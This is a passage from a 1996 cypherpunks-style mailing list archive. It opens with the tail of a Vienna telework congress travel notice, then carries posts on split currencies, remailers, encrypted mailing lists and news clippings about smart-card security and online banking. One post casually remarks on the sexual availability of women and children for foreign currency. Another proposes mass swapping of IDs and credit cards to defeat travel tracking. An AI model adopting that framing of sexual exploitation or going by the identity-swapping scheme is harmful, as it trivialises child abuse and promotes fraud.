a thousand years old of the Roman-German Empire and the treasury of the Order of the Golden Fleece. Afterwards, visit of the Imperial Burial Vault, where more than 130 Habsburgs were burried, among them 12 emperors and 16 empresses. The design of the coffins shows the change in the comprehension of arts over three centuries. Price per person, incl. guide and entrance fees ATS 250, Minimum of 15 people per group Tours are subject to change. --------------------------------------------------------------- Hotel and Travel Arrangements Austropa-Interconvention, Oesterreichisches Verkehrsburo AG, has been entrusted by the organising committee to handle all hotel reservations and asks all participants, to reserve rooms with the enclosed hotel reservation form only. The exact indication of arrival and departure dates, as well as the desired hotel category is necessary. Please make your selection of hotel category according to the following list. Should the requested category not be available anymore, a booking in the next higher category will be made. All prices quoted are per night, per room and include daily breakfast, service charges and all taxes. 1. Category A**** Deposit ATS 2.000, per room Single room ATS 980, to ATS 1.600, Double room ATS 1.450, to ATS 2.360, 2. Category B *** Deposit ATS 1.500, per room Single room ATS 650, to ATS 980, Double room ATS 990, to ATS 1.380, 3. Pension - Category B*** Deposit ATS 1.000, per room Single room ATS 650, Double room ATS 1.100, to ATS 1.290, All rooms with bath or shower and toilette. Please book your hotel before September 30, 1996 Methods of payment for hotel deposits and optional tours Please send a cheque or money order together with the hotel accommodation booking form to Austropa Interconvention, P.O.Box 30, A-1043 Vienna, Austria, or make a bank transfer FREE OF BANK CHARGES to the AUSTROPA account no.: 0035-14775/00 at the Creditanstalt-Bankverein, Vienna, bankcode 11.000. All payments are to be made in Austrian Schillings (ATS). Please do not forget to indicate the name of the participant and the purpose of payment. After the receipt of your deposit we will send you a hotel voucher, indicating the name and exact address of the hotel booked. Kindly inform Austropa Interconvention immediately of any changes in the dates of arrival or departure and in case of cancellation. For cancellations up to one week prior to arrival, a handling fee of ATS 300, per booking will be charged. Afterwards, no more refunds of hotel deposits will be possible. --------------------------------------------------------------- All inclusive Flight Arrangements Austropa Interconvention in cooperation with Austrian Airlines and other IATA carriers offers the participants of the "TELEWORK '96 Congress" all inclusive flight arrangements. These arrangements include the following services: Economy class return ticket on regular flights, 20 kg (44 lbs) baggage allowance, 5 nights accommodation in a double room with bath/shower/WC of hotels in the 3*** category, buffet breakfast, service charges, taxes, transfer from the airport to the hotel and vice versa. All airport taxes are INCLUDED. For participants, travelling alone, please add the single room supplement as listed below. Booking deadline: September 30, 1996. Payment: Please note, that your ticket can be issued only after receipt of full prepayment. Tickets will be mailed to participants after September 30, 1996. Cancellation policies: In case of cancellation or changes before September 30, 1996, Austropa Interconvention will charge a handling fee of ATS 1.000, per person. For cancellations after September 30, 50% of the total cost of the flight arrangement will be charged to the participant. Changes of flight dates are not possible after September 30. All cancellations and changes have to be made in writing. Flight dates: Arrival in Vienna: November 2, 1996 Departure from Vienna: November 7, 1996 If you wish to book different dates or destinations than indicated, please contact Austropa Interconvention. All prices are in Austrian Schillings and are based on ticket prices and exchange rates per January 1996. Prices are subject to changes. Sunday rule applies. Place of Dep *** Hotel Rom 9.785,-- Paris 9.975,-- London 8.295,-- Madrid 10.745,-- Lissabon 11.080,-- Genf 9.540,-- Zurich 9.025,-- Kopenhagen 9.930,-- Amsterdam 9.960,-- Stockholm 10.480,-- Helsinki 12.285,-- Hamburg 11.925,-- Dusseldorf 11.523,-- Frankfurt 10.385,-- Stuttgart 10.015,-- Munchen 8.685,-- Berlin 10.530,-- Dresden 9.965,-- Leipzig 9.965,-- Bremen 12.970,-- Munster 12.645,-- Friedrichshafen 13.530,-- Single room supplement for 5 nights, Hotel *** ATS 800, From jamesd at echeque.com Mon Sep 30 18:58:45 1996 From: jamesd at echeque.com (James A. Donald) Date: Tue, 1 Oct 1996 09:58:45 +0800 Subject: the theory of split currency Message-ID: <199609302118.OAA11208@dns2.noc.best.net> Fred Foldvary wrote: > Is there a name for a dual or split currency, in which > there is one currency for domestic use and another, different > appearing, currency for foreign usage? > > Does anyone know of any country which has had such a > split currency? Many third world nations employed this system, one currency for internal use only, and one currency for international transactions. The international currency was sometimes denominated in hard currency, and reasonably convertible into it. This strategy was frequently associated with police state tactics, lawless imprisonment, and swift execution, for vaguely defined economic crimes. It has become substantially less common in the nineties. The external currency tended to spread into the internal economy, despite police state measures to prevent this from happening, and the internal currency tended to become worthless and could only be spent while holding a gun to the head of the person accepting it. In countries employing this system, women, and often children of both sexes, are often cheaply available for sexual purposes if you have foreign currency. I speculate that this is because people find that they *must* obtain foreign currency, the internal currency being unspendable, and any method available to them for obtaining foreign currency is a criminal offense. A retreat from this system, usually by allowing the international currency to freely penetrate the internal economy, tends to be associated with a substantial reduction in the availability of young girls, as for example in Cuba recently. > This scenario is not entirely hypothetical. I have read that > Senator Patrick Leahy introduced Senate Bill #307 to create > such a split currency. Why am I not surprised that it was Senator Patrick Leahy of crypto bill fame? --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From cybergod at nfx.net Mon Sep 30 19:07:06 1996 From: cybergod at nfx.net (cybergod at nfx.net) Date: Tue, 1 Oct 1996 10:07:06 +0800 Subject: Unsubscribing Message-ID: <1.5.4.16.19960930185337.3d375a62@nfx.net> How do I unscribe? Thank you ver much.. PGP Encrypted Messages Perfered: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzJQQgQAAAEEAOqOH/P/h9xWHxUb0309CWY1094F+HE+/medDnYA8jNJ+I1m obwHXAiCtwRGy3skXVs3rjZDGMINZMcCSA4N+TCUMspvvB6qX8EwJMzRPduj2eHV vHlVYGr42kOb41UH37sFWAd1ppPXVyvV4qNfRG5+tnzoXLRFlOD0x6ZUXpDxAAUR tCNSdXNzZWxsIFMuIEFsYmVlIDxjeWJlcmdvZEBuZngubmV0Pg== =hNsw -----END PGP PUBLIC KEY BLOCK----- PGP Encrypted Messages Perfered: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzJQQgQAAAEEAOqOH/P/h9xWHxUb0309CWY1094F+HE+/medDnYA8jNJ+I1m obwHXAiCtwRGy3skXVs3rjZDGMINZMcCSA4N+TCUMspvvB6qX8EwJMzRPduj2eHV vHlVYGr42kOb41UH37sFWAd1ppPXVyvV4qNfRG5+tnzoXLRFlOD0x6ZUXpDxAAUR tCNSdXNzZWxsIFMuIEFsYmVlIDxjeWJlcmdvZEBuZngubmV0Pg== =hNsw -----END PGP PUBLIC KEY BLOCK----- From iang at cs.berkeley.edu Mon Sep 30 19:19:42 1996 From: iang at cs.berkeley.edu (Ian Goldberg) Date: Tue, 1 Oct 1996 10:19:42 +0800 Subject: POLL RESULTS In-Reply-To: Message-ID: <52phjn$fjs@abraham.cs.berkeley.edu> -----BEGIN PGP SIGNED MESSAGE----- In article , Sandy Sandfort wrote: >Last week I offered an informal poll as to the reputational >effect of "John Anonymous MacDonald" and other apparent nyms. Just remember that "John Anonymous MacDonald" is the name that appears on _every_ item remailed from the jam remailer, ; it's not a nym belonging to a single person. - Ian -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMlBJrEZRiTErSPb1AQEvrQP/TU194LbxJa0Lzz3HBd0+EHewDMc/4MS1 OJMzliOF8nFAWK6pLFy7CT4m0pLmDMvAFIeuv0FnD4h86yCUGRLfuaUyUOKuOmLv DNrHJ8z2OIs3oogsupo+9ySeRn61E6SxrdeoIM7bNVZBBzNMdpXWYUf4FyHLMhay yOTC/pjKhpg= =w/eA -----END PGP SIGNATURE----- From scs at lokkur.dexter.mi.us Mon Sep 30 20:26:40 1996 From: scs at lokkur.dexter.mi.us (Steve Simmons) Date: Tue, 1 Oct 1996 11:26:40 +0800 Subject: Encrypted lists and ease of use In-Reply-To: Message-ID: <199610010016.UAA17469@lokkur.dexter.mi.us> >Why do you need two lists? My server currently hosts a few such lists >(for non-profit international technical projects, extended family >news, etc.) . . . Your solution is exactly what I want to do with the -encrypted list. The reason we want two is that 80-90% of what goes across the list is not sensitive. That kind of thing we want in plaintext for nice tools like grep and glimpse. From dlv at bwalk.dm.com Mon Sep 30 20:33:57 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 1 Oct 1996 11:33:57 +0800 Subject: [NEWS] Crypto-relevant wire clippings Message-ID: <8LV3uD1w165w@bwalk.dm.com> New York Times: Thursday, September 26, 1996 Potential Flaw Seen In Cash Card Security By John Markoff A potential security flaw has been discovered that might make it possible to counterfeit many types of the electronic-cash ``smart cards'' that are now widely used in Europe and are being tested in this country by banks and credit card companies - including Visa and Mastercard. The types of smart cards that are potentially at risk include the kinds already employed in the Mondex cash card system and others used by European consumers. A cash card from Visa International Inc. was demonstrated in a highly publicized trial at last summer's Olympic Games in Atlanta. Chase Manhattan Corp.; Citibank, a unit of Citicorp, Mastercard International Inc., and Visa plan a test this year with 50,000 customers in New York City. Touted as the key to the cashless society of the near future, smart cards are credit card-sized packets that contain a microprocessor chip and a small amount of computer memory for storing bits of electronic information that represent money. At businesses equipped with the computerized devices that accept smart-card payments, the cards are supposed to be as good as cash - and as vulnerable to theft or loss as a $100 bill. But the cards have been promoted as tamper-proof, which is why computer scientists at Bell Communications Research, one of the nation's leading information-technology laboratories, are now sounding the alarm, saying that a sophisticated criminal might be able to tweak a smart-card chip to make a counterfeit copy of the monetary value on a legitimate card. ``If you're deploying these smart-card devices in a business or government electronic-payment system, then I think you need to look carefully at their actual security,'' said Richard Lipton, chief scientist at Bell Communications and a professor of computer science at Princeton University. Lipton and two colleagues at Bell Communications Research - or Bellcore - are about to publish a research paper on the potential smart-card flaw, which they recently discovered through theoretical research on the technology. No smart-card counterfeiting has been discovered yet, but Lipton and his team believe that such crimes are inevitable unless the technology is redesigned. The researchers have also been quietly notifiying the seven regional Bell telephone companies that jointly own Bellcore about their discovery. Bell companies including US West, and long-distance companies, including AT&T Corp., have been planning to market smart cards as a secure way to pay for long-distance calls without entering credit card numbers or generating the audit-trail of a phone bill. Despite the Bellcore warning, not all executives at companies using smart cards consider the theoretical threat a real danger. ``This is very speculative,'' said Chris Jarman, vice president of chip card technology at Mastercard, who had seen a draft of the Bellcore research paper. ``I have yet to see a smart-card scheme with a vulnerability,'' Jarman said. And even some industry executives, who said it was conceivable that individual smart cards might be at risk, contended that the vulnerability was not a threat to smart-card technology in general - any more than the occasional passing of a counterfeit $20 bill undermines the U.S. currency system. ``This is a significant event but it doesn't blow the industry apart,'' said William Barr, vice president of the Smart Card Forum, a trade organization of 230 U.S. companies and government agencies. Still, Barr conceded, ``this approach offers some ability to mount attacks that have not been anticipated.'' The Bellcore researchers, however, consider the potential flaw significant because it could short-circuit the data-scrambling software contained in many types of smart cards. The software is used to protect the card's secret code, which is designed to prevent counterfeiting. In theory, at least, the Bellcore researchers said that a smart card's security could be breached by forcing the microchip in the card to make a calculation error. This could be done in a number of ways, the researchers said, whether through sophisticated means like bombarding the card with radiation or perhaps cruder methods like placing it in a microwave oven. Once the card can be forced to make even a small calculating error, the researchers said that a mathematical formula they derived could use this error to extrapolate the secret data that authenticates the card when it is inserted in a merchant's card reader. The researchers suggested that in any system where it was possible to know about a calculation error it might be possible to exploit this newly discovered vulnerability. The Bellcore team is conducting further research into this possibility. ``These systems tend to have a fragile behavior,'' said another of the researchers, Richard A. DeMillo, who is vice president for information technology at Bellcore. ``Our technique is like tiny lever that makes it possible to pry open the vault that the secret information is stored in.'' U. S. Banker: Thursday, September 26, 1996 Mondex gets Cold, Hard Cash By Joseph Radigan The $ 119 million that National Westminster Bank plc and Midland bank plc raised this summer to fund their Mondex smart card program should provide at least some the capital they'll need to increase its acceptance. The capital was raised in conjunction with Mondex's spinoff from the two British banks that created the program as a joint venture five years ago. The new setup is being called "Mondex International," and besides NatWest and midland, which now hold minority stakes, it includes 15 other shareholding banks. One of them is Hongkong and Shanghai Banking Corp., which like Midland is owned by HSBC Group of London. In the U.S., Wells Fargo & Co. and AT&T Corp.'s Universal Card Services Group paid a combined $ 46.5 million for their 30% stake. The other investors include major banks in Canada, australia and New Zealand. Another 23.5% remains to be sold for roughly $ 1.5 million for each 1% interest. Not all the new funds are going toward Mondex's future development. Some will be used to compensate NatWest for the costs it incurred in leading the original research and development. NatWest's Michael Keegan became Mondex's chief executive as part of the restructuring, replacing Tim Jones, a fellow NatWest executive who had been Mondex's CEO through its startup phase. Jones is returning to NatWest as the managing director for the London bank's electronic commerce group and will keep a seat on the card association's board. David Mills, who runs Midland Bank's retail banking business will stay on as chairman of Mondex International, but he also has a seat on the board of MasterCard's European affiliate, Europay. These two card associations, in conjunction with Visa, are backing a smart card program that rivals Mondex's. But Keegan says that this does not pose a conflict of interest. As in the American credit card business, where banks are free to issue both MasterCard and Visa, Keegan foresees a future in which Mondex members will issue both Mondex and Europay smart cards. Now that Mondex is in the process of collecting the financial fuel it will need to fund its growth, the smart card organization's future revenue will come mostly from annual dues paid by member banks, Keegan says. The per-transaction interchange fee that supplies MasterCard and Visa with most of their annual revenue is not practical for the low-value payments for which smart cards are intended. Imposing a transaction fee on these would make the system impractical. In addition, because Mondex attempts to electronically mimic currency, most transactions will not settle through a captive payments clearing system. The only settlement will take place on an end-of-day basis when merchants or customers redeem their Mondex value at their local banks. San Francisco Chronicle: Thursday, September 26, 1996 Hundreds of Companies Have Smart Card Systems By Laura Castaneda The smart money is on smart cards -- even though most consumers have yet to lay a finger on them. Valerie Baptiste is one exception. The Wells Fargo secretary is participating in a company experiment that lets her make purchases at 22 San Francisco shops with a smart card. Resembling credit cards, smart cards are embedded with computer chips. They can store cash and other data such as medical history and credit information. ''A big advantage is the convenience of not having to fumble around in my purse for cash,'' said Baptiste as she was buying juice at The Wildflower Cafe. Hundreds of companies besides Wells Fargo, including several in the Bay Area, have launched smart card pilot programs to try and cash in on the cashless society of the future. Getting merchants and customers to accept and use a new form of payment won't happen overnight. But experts believe the widespread acceptance of smart cards is inevitable. ''I'm confident that the push will be on to make it happen because there are so many powerful entities interested in seeing cash go away,'' said Bruce Brittain of Brittain Associates in Atlanta, a consumer behavior research firm. David Poe, a director of Edgar Dunn & Co. in San Francisco, a management consulting firm that specializes in new product development, agreed. ''I think (smart card use) is going to be evolutionary as opposed to revolutionary,'' he said. Entities that want to cut down on the use of cash include big banks, credit card issuers, universities and the U.S. government. Why? Smart cards can save the cost of collecting, counting, securing and transferring cash. Most pilot programs feature smart cards that simply store cash, usually up to $ 20. The amount of each purchase is electronically deducted from the card at the point-of-sale. These kinds of smart cards are ideal for smaller transactions like parking, lunches, dry cleaning, convenience stores, vending machines and fast food. However, smart card technology is almost limitless. Combining computer chips and magnetic stripes allows a single card to be used as a cash, credit, debit and ATM card. Among the pilot programs in place: * Bank of America and Visa International are experimenting with employee-only stored value smart cards for purchases from company cafeterias and vending machines and some outside merchants. * Ohio and Wyoming plan to start using smart cards for food stamp and nutrition programs, and the U.S. Department of Defense is testing a multiapplication smart card at military bases in Hawaii. * The Washington, D.C., transit system plans to implement smart card technology for fares, and the Metropolitan Transit Commission, which serves 25 Bay Area transit services, is also considering launching smart card technology in about two years. * The University of Michigan, Western Michigan University, Washington University, the University of Minnesota, the University of North Carolina, Florida University and the University of San Francisco have smart cards for on- and off-campus in cafeterias, bookstores and restaurants. Smart cards are already widely used overseas. In Germany, more than 80 million people have been issued smart cards containing health insurance information. The potential market is huge, with more than half a billion smart cards expected to be in use worldwide by the year 2000, according to the Smart Card Forum, a group dedicated to accelerating the widespread acceptance of smart cards. A Smart Card Forum poll found that almost two-thirds of respondents see smart cards as a convenient option for carrying important personal information, and 40 percent would prefer to use the cards instead of cash for everyday purchases. Another Smart Card Forum survey found that retailers see various benefits such as gathering customer information, offering loyalty or ''frequent shopper'' programs and electronic ticketing and couponing. Despite high expectations, smart cards have a long way to go before they become as popular as ATM cards. Critics of smart cards, worried about privacy issues, liken the card's ability to track a consumer's every purchase to Big Brother in George Orwell's novel ''1984.'' There is also the classic ''chicken and egg'' problem: Merchants don't want to spend the money for smart card equipment until they're in widespread use, while consumers don't want to use smart cards until more merchants accept them. ''It's going to be a tough sell for consumers,'' said Rob Palmer, owner of The Wildflower Cafe, which has participated in the Wells Fargo pilot program for about a year. ''Cash is very convenient.'' Palmer agreed to participate in the experiment because it was free. But he said it may not be worth paying for later because smart card business only accounts for about 2 percent of his transactions. It costs about $ 500 per unit for a point-of-service terminal capable of processing smart cards. It's unclear whether banks or merchants will ultimately foot the bill. Many new debit and credit card terminals are also incorporating smart-card capabilities. The Smart Card Forum estimates that it costs 80 cents to $ 15 to manufacture a card, depending on the size of the chip. Right now, banks and card issuers are paying for the cards. Eventually retailers could sell their own affinity cards. Today, some cards can only be used once, others can be reloaded with more cash. To be cost-effective, though, most people think they cards will have to be reloadable and have more than one use. To succeed, smart cards will have to offer clear benefits to merchants (such as loyalty programs that generate repeat business) and to consumers (such as discounts or special promotions). The cash-only cards do not have any security features, so if you lose one, it's easy for someone else to spend your money. Cards that also have personal information will need to have security features such as ''encryption,'' or electronic scrambling that protect against unauthorized use. In fact, a survey of the world's 10 largest central banks released earlier this month by a task force of computer and security experts found that security measures now used with electronic money are adequate to protect consumers from fraud. Companies are also starting to look at other smart card applications. Microsoft Corp. is working with several other companies to develop open standards that integrate smart cards with computers, so that you could transfer money from your checking account onto a smart card using your PC. The smart cards also could be used make purchases over the Internet. Many people are afraid to use credit cards to buy things over the Internet because they're afraid their account numbers will get stolen. Yesterday, Mondex International Ltd. and CyberCash, Inc. announced an agreement to produce smart cards that will let consumers purchase goods over the Internet and download and transfer funds. In 1998 Wells Fargo plans to roll out a multipurpose card made by Mondex that will let people transfer money from their accounts to smart cards via computer. Such smart card technology will be like ''having an ATM in your own home,'' said Janet Hartung Crane, senior vice president for Wells Fargo. American Banker: Thursday, September 26, 1996 Checkfree Sees On-Line Banking Tripling in 1997 By JENNIFER KINGSON BLOOM Peter J. Kight, chief executive officer of Checkfree Corp., makes two predictions about on-line banking. He says that 1996 will be remembered as the year banks learned the power of the technology, and that the number of consumers banking through electronic channels will more than triple in 1997. The statements carry more weight than they would have a year ago, because Mr. Kight's company has transformed itself into a formidable force in the interactive banking market. Once known primarily as a processor of electronic bill payments, Checkfree has acquired four companies this year, giving it a soup-to-nuts line of electronic banking products and services. Behind the acquisitions lies Mr. Kight's vision of banking's future. "Every major bank in the country will be in the market with an electronic banking product within the next 18 months," Mr. Kight said. "It's following exactly the same curve as credit cards." For Mr. Kight, these developments represent the culmination of 15 years of hard work. Just last week, Checkfree announced an agreement to acquire the processing subsidiary of Intuit Inc., which will give it access to the latter company's Quicken product, its customers, and bank partners. "This is what I paid my dues for," Mr. Kight said. "This is what we built the company to do." On Wednesday, Checkfree announced partnerships with BellSouth, Capstead Mortgage Co., and the Small Business Administration. The arrangements will let the companies and the agency collect bill payments electronically. Mr. Kight founded Columbus, Ohio-based Checkfree in 1981, when he was 24. The previous year, he was managing a chain of fitness centers in the Southwest. While pondering the best way to sell health club memberships, he hit upon the concept of automatic monthly payments. At the time, only a handful of companies -- most of them insurance providers -- were collecting payments electronically. By 1982, a year after he set up his electronic funds transfer service company, Mr. Kight was named an "entrepreneur of the year" by Ernst & Young. Last year, Checkfree went public. This year the company has acquired Servantis Systems Inc. in Atlanta; Interactive Services Corp. in Portland, Ore.; Security APL in Bloomfield, Ill.; and Intuit Services in Downers Grove, Ill. "Each step, if you look at it, has been one to strengthen our position and our strategic capabilities," Mr. Kight said. Checkfree has kept its headquarters in Ohio, but the acquisition of Servantis' campuslike setting in Atlanta has begged the question of whether the offices might move. Intuit Services employees will remain in Illinois, where the work force likely will expand. Mr. Kight, 40, divides his time between Atlanta and Columbus and said he will decide within a year whether to initiate a formal move. The union of Checkfree and Intuit Services is something of a remarriage. Checkfree was the original processor of payments emanating from Quicken software before Intuit Inc. acquired National Payment Clearinghouse Inc. National designed the banking connections for the rival Microsoft Money personal finance package, and the rechristened Intuit Services Corp. went on to handle the lion's share of payments for PC banking customers. "Essentially, Intuit enabled Checkfree to really prove the efficacy of electronic bill payment," Mr. Kight said of the early days. "If it hadn't been for Intuit and the link of Checkfree and Quicken, we wouldn't have gotten to the point where we could prove to the banks that this really does work. "Even though the banks didn't like the fact that we and Intuit did that without them, at the time, they weren't doing it. So what we did is we proved it, to get them to pay attention." What followed was a fairly messy divorce, in which Intuit withdrew its business from Checkfree, and Checkfree sued Intuit for patent infringement. Mr. Kight said he managed to stay friendly with key Intuit executives. He and Scott Cook, Intuit's founder and chairman, had "a great deal of mutual respect," he said. The relationships proved central to the recent acquisition. A telephone call at the beginning of this year from Mr. Kight to Intuit chief executive officer William V. Campbell started the ball rolling. Mr. Kight said a news article about technology companies jockeying for position in electronic commerce prompted him to pick up the phone. He said he told Mr. Campbell: "You've got stress at your bill payment service, but you're growing like crazy. I'm growing like crazy. You're signing up banks, I'm signing up even more banks. Maybe if we work together ... and he said, 'I think you're right.' And that started it." Mr. Kight said he and Mr. Cook agreed each company would do best to focus on its core competency: Checkfree on transaction processing, Intuit on its software. "Part of Intuit's strategy didn't work too well, which was signing up more banks" for its processing service, Mr. Kight said. "But part of its strategy worked extremely well -- the power of Quicken working with the banks." The acquisition will boost Checkfree's bank customers to 181, and the number of individuals for whom it processes transactions to 1.2 million. Seeing 1996 as a turning point, Mr. Kight said he hopes bankers will accelerate their moves into electronic banking now that they have easier access to Quicken. Until now, banks that wanted to be compatible with Quicken had to become customers of Intuit Services. Checkfree's main competitor today is Visa Interactive. Looming on the horizon is Integrion Financial Network, a partnership of 15 banks and IBM. "Right now, we're 100% supportive of Integrion, but to the extent that Integrion chooses to work in our business, we'll be very tough competitors," Mr. Kight said. Mr. Kight and numerous industry observers are still trying to make sense of Integrion. Phoebe Simpson, an electronic commerce analyst at Jupiter Communications in New York, said: "It's going to boil down to Checkfree and Visa Interactive in the long run. It's yet to be determined whether Integrion plans to build an entire payment processing unit." But David E. Weisman, who covers the same ground for Forrester Research in Cambridge, Mass., said it will be a three-way race. He said "Checkfree's in good position here because they've got more volume" than Visa or Integrion. John A. Russell, chief spokesman for Integrion member Banc One Corp. in Columbus, Ohio, called the Intuit acquisition a "good move" for Checkfree -- of which Banc One is a longtime customer -- as well as a competitive boost. "It's key for Checkfree to do exactly what they're doing, and that's to get big quickly so they can realize the economies of scale in this manufacturing process," he said. Mr. Kight agreed that such economies of scale would serve his company well as on-line banking gains vogue. "I don't believe that the Internet is going to happen quite as fast as the Internet-focused people believe it's going to," Mr. Kight said. "I think there's going to be a trend toward banks providing more service to their customers (when they) can connect directly to the bank without the Web being involved. I think we're going to see that evolution over the next three or four years." But, Mr. Kight added, "I do believe that electronic banking is absolutely on a critical mass-adoption curve as we speak." Success and growth haven't changed Mr. Kight's down-to-business mentality. When asked how he celebrated last week's deal closing, Mr. Kight said, "By getting on a plane and flying to Chicago to meet with the ISC work force." --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From rah at shipwright.com Mon Sep 30 20:44:42 1996 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 1 Oct 1996 11:44:42 +0800 Subject: Mailmasher Message-ID: Hey guys, Take a look at: http://www.mailmasher.com/ It's a way to get your mail through a web page. Pretty useful when you're at a braindead "cyber-cafe" machine and want to read your mail. The problem is, mailmasher knows you POP password. Anyway to do this more securely? Cheers, Bob ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From azur at netcom.com Mon Sep 30 20:56:56 1996 From: azur at netcom.com (Steve Schear) Date: Tue, 1 Oct 1996 11:56:56 +0800 Subject: The John Doe rebellion Message-ID: I have some direct insight as to how airlines interpret the new travel provisions and what they are reasonably able to accomplish in improving safety via identity and luggage checks. I was wondering if with gov't trying to compile dossiers on travellers it might be possible for a large enough percentage of frequent air travellers to assume the same identity (e.g., John or Jane Doe). If so, a service could be established to book airline reservations under a single credit card for Does so as to confound automated tracking systems. Eventually, Does could arrange to exchange IDs (if their ages and descriptions matched) and even credit cards (again assuming equivalence) to really monkey wrench things. -- Steve From blancw at microsoft.com Mon Sep 30 21:08:37 1996 From: blancw at microsoft.com (Blanc Weber) Date: Tue, 1 Oct 1996 12:08:37 +0800 Subject: POLL RESULTS Message-ID: From: Timothy C. May Interesting that Detweiler returned with a _Russian_ nym. ........................................................................ I don't think LD is Russian. I think he's actually an Asparagus. (bwahhahahhahahhah) .. Blanc From roger at coelacanth.com Mon Sep 30 21:10:34 1996 From: roger at coelacanth.com (Roger Williams) Date: Tue, 1 Oct 1996 12:10:34 +0800 Subject: Encrypted lists and ease of use In-Reply-To: <01IA3FDVFUWO8Y57AQ@mbcl.rutgers.edu> Message-ID: wrote: > Recently I've been involved in a number of small (30 people or > less) mailing lists which occasionally use PGP for encrypted mail. > The hassle comes when one is encrypting a message to the list... Well, let the list server keep track of who is subscribed. > What I propose to do is have a second list, list-encrypted at host, > for every list at host... Why do you need two lists? My server currently hosts a few such lists (for non-profit international technical projects, extended family news, etc.): Subscribers send mail to the list server, PGP-encrypted with the list's public key. The list server decrypts each inbound message with its private key (passphrase entered at reboot). The message may be a message to the list, or a command to the list server. The list server maintains a list of subscribers' public keys and encrypts each list message (or digest, for higher-volume lists) for each subscriber (our lists are small, so we prefer to encrypt mail for one subscriber at a time). Although messages exist temporarily as plain text arrays in the list server, it doesn't maintain an archive of messages. And as with any (semi-)secure server, physical security is an issue. As Allen mentioned, I think PGPdomo handles this, but majordomo is pretty easy to hack up for any variation on this theme... -- Roger Williams finger me for my PGP public key Coelacanth Engineering consulting & turnkey product development Middleborough, MA wireless * DSP-based instrumentation * ATE tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/ From dlv at bwalk.dm.com Mon Sep 30 21:27:13 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 1 Oct 1996 12:27:13 +0800 Subject: [NEWS] Crypto-relevant wire clippings Message-ID: Money Daily: Tuesday, September 24, 1996 IBM, Bank Alliance May Speed Acceptance of Online Banking By Lloyd Chrein If one muscle-bound company is what it will take to turn online banking into a household word, then the recently- formed Integrion Financial Network, a conglomeration of IBM and 15 heavy-hitting U.S. and Canadian banks, may have the right formula, say analysts. In many ways Integrion appears a natural fit: the meeting of a major data-processing player -- IBM -- and institutions that will potentially need a lot of online data processed -- banks. The new company, a separate entity with its own CEO and board of directors, will offer the means for consumers to connect to their banks (via the IBM Global Network, the Internet or commercial online services) and will partner with developers of the necessary online banking software. It is expected to begin operating in early 1997. "If they can use the clout of all these big banks, plus IBM, to decrease the cost of providing online banking and ultimately lower costs and improve service for consumers, then they're going to coax more consumers into online banking," says Karen Epper, an analyst with Forrester Research. "The question is whether this big ship can move quickly enough to keep up with the changes in the online world and stay in the race." As things stand now, it seems like there is a lot of ground to be made up. A recent study by the San Francisco-based Odyssey L.P. found that just a handful of American households use the 'Net for banking -- just 1% of the 14% of U.S. households with access to an online service. "Online banking is confined to a small minority of a small minority," said Nicholas Donatiello president of Odyssey. "But I think it has the potential to be bigger." Members of Integrion, however, took issue with the Odyssey report. "Those numbers don't seem right," said David Fortney, in charge of access and payment strategies for the Charlotte based NationsBank. "But we do agree that there are not a lot of people banking online. We see that as a huge opportunity. We think there is a lot of pent-up demand." A Barnett Bank spokeswoman said that 25% of the bank's current customers use the telephone for home banking, an indicator that online banking through Integrion -- which should be more convenient -- will also be a hit. "We will see an explosion in this area," she predicted. The problem with online banking as it exists now, say Integrion members, is that each bank offers different levels of service, uses different software, and has to bear the full cost of designing and managing its online system. With Integrion, they note, banks will be able to take advantage of economies of scale, ultimately offering consumers a wider choice of software programs and means of accessing their accounts than if they went it alone. "What we hope to do is speed the pace at which electronic banking services will reach the consumer," says Chuck Hieronymi, senior vice president of marketing at NationsBank. "We also hope to speed the rate at which banks will adopt online banking. We hope to attract as many banks to join as possible." The company intends to eventually allow consumers to use most of the major personal finance software, including Microsoft Money and Intuit's Quicken, as well as Internet browsers like Netscape Navigator and Microsoft Explorer and online services Prodigy, America Online and CompuServe. While Integrion hasn't formed any alliances with developers or online services so far, potential partners are warm to the concept. "We fully expect our products and technology will be a part of this," says Matt Cone, business development manager for Microsoft, who notes that there are also potential uses for Windows NT and BackOffice. To attract all the major players under one roof, Integrion needs to be big. And it is: the 15 member banks comprise over half the retail banking population in North America -- more than 60 million households. Member banks are: ABN AMRO, BANC ONE, Bank of America, Barnett Bank, Comerica, First Bank Systems, First Chicago NBD, Fleet Financial Group, KeyCorp , Mellon Bank, Michigan National Bank, NationsBank, PNC Bank, Royal Bank of Canada, and Washington Mutual, Inc. Of course, there is competition, mainly from data processing companies such as CheckFree and Visa Interactive -- IBM will perform their functions for Integrion member banks. Yet according to Epper, even the competitors are potential partners in cyberspace. "CheckFree will compete for the same bill payment system contracts as Integrion, but it will also work with Integrion to support bill payment systems," says Epper. "In the online world, companies that are competitors are also working together. That has been the paradigm for a long time." To have any effect on improving online banking's numbers, Integrion will have to stay on the cutting edge, reacting quickly to rapid changes in security, authentication and other technological advancements. Hieronymi claims that the company will be able to make quick decisions and won't be weighed down by the girth of its many members. But Epper has her doubts. "This company has been speculated about for two years and in serious discussion for the past year," she says. "At the rate at which online banking is moving, if they take that long to make decisions they are likely to lose a real advantage. As it is, they're already a little late to the party." For more Web-formation, visit: http://www.checkfree.comfor CheckFree http://www.forrester.com for Forrester Research http://www.ibm.com for IBM http://www.intuit.com for Intuit http://www.nationsbank.com for NationsBank Computerworld: September 23, 1996 Can Banks Survive the Online Onslaught? By Ralph Soucie Recently, Hugh McColl, chairman of NationsBank, admitted to The Wall Street Journal that he is scared of what technology might do to his business. That isn't something you'd expect from the architect of a $ 192 billion banking 